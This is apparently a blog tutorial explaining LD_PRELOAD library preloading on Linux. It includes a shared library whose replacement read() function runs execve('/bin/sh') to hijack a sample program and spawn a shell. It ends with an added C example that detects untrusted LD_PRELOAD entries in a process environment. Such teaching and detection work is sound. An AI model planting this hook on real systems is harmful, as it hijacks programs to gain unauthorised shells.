What are Environment Variables?
Environment variables are a set of values that can affect how a process or binary behaves.
You can check environment variables with the "env" command in Linux.
What is LD_PRELOAD?
LD_PRELOAD is an environment variable that names shared libraries to be loaded for an executable binary in Linux. When a dynamically linked binary starts, the dynamic linker loads the libraries listed in LD_PRELOAD before the others, so functions such as read, write, printf, etc. are looked up in them first. If an attacker can control LD_PRELOAD, an exploit is possible.
Hooking LD_PRELOAD
Hooking through LD_PRELOAD can change the flow of the program, and this results in an EXPLOIT!
The source below is [env.c].
    // gcc -o env env.c
    #include <unistd.h>
    #include <stdio.h>

    int main()
    {
        char buf[20];

        write(1, "name : ", 7);        // prompt on stdout
        read(0, buf, sizeof(buf)-1);   // read() is resolved by the dynamic linker at run time
        write(1, "Hi\n", 3);
        return 0;
    }
This is a simple read/write function example.
Now let's make a library file called libc. In Linux, a shared library usually has the .so file extension.
The source below is [libc.c].
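    // gcc -o libc.so libc.c -fPIC -shared
    #include <unistd.h>

    // Same name and signature as libc's read(), so a preloaded copy of
    // this library is found first. It starts a shell instead of reading.
    ssize_t read(int fd, void *buf, size_t count) {
        execve("/bin/sh", 0, 0);
        return -1; // reached only if execve() fails
    }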
I made a read() function that executes [execve("/bin/sh", 0, 0)], which gives me a shell!
After compiling with gcc, let's hook!
The libc I made is located in /root/bin.
I can set LD_PRELOAD with the "export" command like this.
The "echo" command can be used to see and check the environment variable.
From now on, every dynamically linked binary that I run from this shell loads [/root/bin/libc.so] ahead of [/lib/x86_64-linux-gnu/libc.so.6], which is the real libc, so its read() is used in place of the real one!
When I run "./env", I get a shell!!
This is because the read() function in [/root/bin/libc.so] executes [execve("/bin/sh", 0, 0)], which runs a shell.
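To spot the kind of preload set above from the defender's side, the following added example (not code from the original post) scans an environment block in the NUL-separated layout of /proc/<pid>/environ and counts LD_PRELOAD entries that point outside trusted library directories. The function names, the trusted-directory list and the sample buffer are assumptions made for this illustration.

```c
/* Added example, not from the original post: count untrusted LD_PRELOAD entries. */
#include <stdio.h>
#include <string.h>

/* Assumption: directories this check treats as trusted library locations. */
static const char *TRUSTED[] = { "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/" };
/* Constructed sample in /proc/<pid>/environ layout; preload path as in the post. */
static const char SAMPLE[] = "HOME=/root\0LD_PRELOAD=/root/bin/libc.so\0PATH=/usr/bin";

/* 1 if the path is absolute, has no "..", and sits under a trusted directory. */
static int path_is_trusted(const char *p, size_t len)
{
    if (len == 0 || p[0] != '/') return 0;   /* bare or relative names are flagged */
    for (size_t i = 0; i + 1 < len; i++)
        if (p[i] == '.' && p[i + 1] == '.') return 0;
    for (size_t i = 0; i < sizeof(TRUSTED) / sizeof(TRUSTED[0]); i++) {
        size_t n = strlen(TRUSTED[i]);
        if (len > n && memcmp(p, TRUSTED[i], n) == 0) return 1;
    }
    return 0;
}

/* Walk NUL-separated KEY=value records and count flagged LD_PRELOAD entries. */
int count_untrusted_preloads(const char *env, size_t env_len)
{
    static const char key[] = "LD_PRELOAD=";
    const size_t klen = sizeof(key) - 1;
    size_t pos = 0;
    int hits = 0;
    while (pos < env_len) {
        const char *nul = memchr(env + pos, '\0', env_len - pos);
        size_t end = nul ? (size_t)(nul - env) : env_len;   /* end of this record */
        if (end - pos > klen && memcmp(env + pos, key, klen) == 0) {
            size_t s = pos + klen;
            while (s < end) {                /* the list is split on ':' or ' ' */
                size_t e = s;
                while (e < end && env[e] != ':' && env[e] != ' ') e++;
                if (e > s && !path_is_trusted(env + s, e - s)) hits++;
                s = e + 1;
            }
        }
        pos = end + 1;
    }
    return hits;
}

int main(void)
{
    return printf("untrusted preloads: %d\n", count_untrusted_preloads(SAMPLE, sizeof(SAMPLE))) < 0;
}
```

On a live system the same function can be given the bytes read from /proc/<pid>/environ, which holds the environment the process was started with.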